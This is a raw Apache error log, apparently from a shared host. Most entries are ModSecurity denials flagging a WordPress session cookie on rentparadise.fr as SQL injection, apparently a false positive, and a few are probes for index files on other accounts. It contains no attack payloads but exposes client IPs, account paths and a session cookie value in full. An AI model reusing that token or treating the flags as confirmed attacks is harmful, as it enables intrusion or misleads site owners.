[Mon May 11 22:30:58.832905 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8gqFW67LJTsgN3jQNhgAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:59.446856 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8gqFW67LJTsgN3jQNhgAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:59.557927 2026] [authz_core:error] [pid 1590352:tid 1590399] [client 34.174.169.211:39788] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.php
[Mon May 11 22:30:59.557995 2026] [authz_core:error] [pid 1590352:tid 1590399] [client 34.174.169.211:39788] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.php5
[Mon May 11 22:30:59.558032 2026] [authz_core:error] [pid 1590352:tid 1590399] [client 34.174.169.211:39788] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.php4
[Mon May 11 22:30:59.558064 2026] [authz_core:error] [pid 1590352:tid 1590399] [client 34.174.169.211:39788] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.php3
[Mon May 11 22:30:59.558134 2026] [authz_core:error] [pid 1590352:tid 1590399] [client 34.174.169.211:39788] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.pl
[Mon May 11 22:30:59.558244 2026] [authz_core:error] [pid 1590352:tid 1590399] [client 34.174.169.211:39788] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.cgi
[Mon May 11 22:30:59.558290 2026] [authz_core:error] [pid 1590352:tid 1590399] [client 34.174.169.211:39788] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.jsp
[Mon May 11 22:30:59.558346 2026] [authz_core:error] [pid 1590352:tid 1590399] [client 34.174.169.211:39788] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.phtml
[Mon May 11 22:30:59.558373 2026] [authz_core:error] [pid 1590352:tid 1590399] [client 34.174.169.211:39788] AH01630: client denied by server configuration: /home/ofcrysta/public_html/old/index.shtml
[Mon May 11 22:30:59.831340 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8g6FW67LJTsgN3jQNiAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:30:59.831672 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8g6FW67LJTsgN3jQNiAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:00.411768 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8g6FW67LJTsgN3jQNiAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:00.627303 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8hKFW67LJTsgN3jQNigAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:00.627737 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8hKFW67LJTsgN3jQNigAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:00.998924 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8hKFW67LJTsgN3jQNigAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:01.426731 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8haFW67LJTsgN3jQNiwAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:01.427019 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8haFW67LJTsgN3jQNiwAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:02.028442 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8haFW67LJTsgN3jQNiwAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:05.136147 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8iaFW67LJTsgN3jQNkgAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:05.136451 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8iaFW67LJTsgN3jQNkgAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:05.724175 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8iaFW67LJTsgN3jQNkgAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:06.438109 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8iqFW67LJTsgN3jQNlAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:06.438552 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8iqFW67LJTsgN3jQNlAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:07.055671 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8iqFW67LJTsgN3jQNlAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:07.455187 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8i6FW67LJTsgN3jQNlwAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:07.455482 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8i6FW67LJTsgN3jQNlwAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:07.985618 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8i6FW67LJTsgN3jQNlwAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:08.341080 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8jKFW67LJTsgN3jQNmAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:08.341393 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8jKFW67LJTsgN3jQNmAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:08.894895 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8jKFW67LJTsgN3jQNmAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:09.122233 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8jaFW67LJTsgN3jQNmQAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:09.122515 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8jaFW67LJTsgN3jQNmQAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:09.478983 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8jaFW67LJTsgN3jQNmQAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:11.634329 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8j6FW67LJTsgN3jQNmwAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:11.634611 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8j6FW67LJTsgN3jQNmwAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:12.227423 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8j6FW67LJTsgN3jQNmwAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:12.460763 2026] [autoindex:error] [pid 1606352:tid 1606429] [client 45.150.177.77:41101] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 22:31:12.845798 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8kKFW67LJTsgN3jQNnAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:12.846083 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8kKFW67LJTsgN3jQNnAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:13.442243 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8kKFW67LJTsgN3jQNnAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:31:14.040903 2026] [autoindex:error] [pid 1590352:tid 1590394] [client 136.0.126.69:51227] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 22:31:15.264820 2026] [autoindex:error] [pid 1605480:tid 1605536] [client 31.57.76.150:44105] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
